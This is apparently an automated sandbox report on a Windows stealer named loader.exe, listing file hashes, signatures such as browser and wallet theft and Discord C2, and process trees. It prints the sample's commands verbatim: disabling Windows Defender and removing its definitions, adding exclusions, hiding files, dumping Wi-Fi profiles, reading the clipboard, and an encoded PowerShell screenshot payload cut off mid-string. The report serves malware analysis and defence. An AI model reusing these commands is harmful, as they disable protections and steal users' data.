SHA256 d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6
SHA512 556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

memory/2528-23-0x00000000743D0000-0x00000000748E0000-memory.dmp

\??\pipe\crashpad_2380_CGQSVQOBLHGFJCWT

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 92cfe9b0a12137eda28c94abd1d39386
SHA1 5441ee0fbbad98feaa99d749905ddde2eb5cd161
SHA256 28a4b107323818ed9ce316a4e85aa9cf37a787608fcc407d403a2f0bed46cd54
SHA512 56326484df15eef56d4517a5c997d48787f56c2ca68d2649befa36680d615b10c8e5990d992bc7cf2d71ccc8dbe44ac34743e2b4d36916ac06667d58d200cef7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 964f98388a311ba580ca958b942cc2ad
SHA1 397bf9b80456415feee4192706e7a72b87403724
SHA256 4ffcb7ff517663a2771dfc5609ea22b21af6f5236fca4fcc40334e97a9780e83
SHA512 ba4c6f014c73a43eb86b5259487487100dbbecd0b4badae0dce3c88b1ec61d6c98891a777964bf1fedabc4b55d257e2a64ea0acd6452561bbc19a275676c4bee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\64d11bfa-f24a-4d21-b1fd-064e15074115.tmp

MD5 f0a32f3063f7ae3e9eeb061fd62c11e7
SHA1 d1a77f03490a2b74f26065a466292d9b68d79411
SHA256 a4ddadb9c70496fdd036d91ed1b06265036b8200b5f11ea6675530f1d4486620
SHA512 1b174164e8c1caa63d0933517c29344e55c3479a11dfa2dd4ae112de7acd8302dea99016926c5ad4d73852031182c399a959f9c1e4e033c2f9b9dd68849e0592

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 ef14b04ee9fbc25ff3250e0c551a9609
SHA1 3722e7ff1803b8e71ade4298c6ff1f584212ac70
SHA256 ef298e983d25e72ca954217f03419a92b9f2e5fbc03ff810eaed2a1550056b8d
SHA512 da01cf45a98bddaaa17373841435a1bebc1773c0064845249f7407f436fa95914117fc4ce3508f3b3ecf31b993f0db347f7a4c2f94dfb5daa0551fd4d533266a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-31 18:26

Reported

2024-05-31 18:29

Platform

win10v2004-20240426-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI5402\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 540 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 540 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 540 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Users\Admin\AppData\Local\Temp\loader.exe
PID 1696 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1184 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1184 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1184 wrote to memory of 1540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 560 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 560 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 560 wrote to memory of 2168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1696 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1336 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1336 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1336 wrote to memory of 1972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1696 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 2148 wrote to memory of 1684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2148 wrote to memory of 1684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2148 wrote to memory of 1684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1696 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 4968 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4968 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4968 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 5080 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 5080 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 5080 wrote to memory of 1888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1696 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 3196 wrote to memory of 2060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3196 wrote to memory of 2060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3196 wrote to memory of 2060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1696 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 1696 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\loader.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 4424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Users\Admin\AppData\Local\Temp\loader.exe

"C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\loader.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍‎ .scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\loader.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍‎ .scr'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAA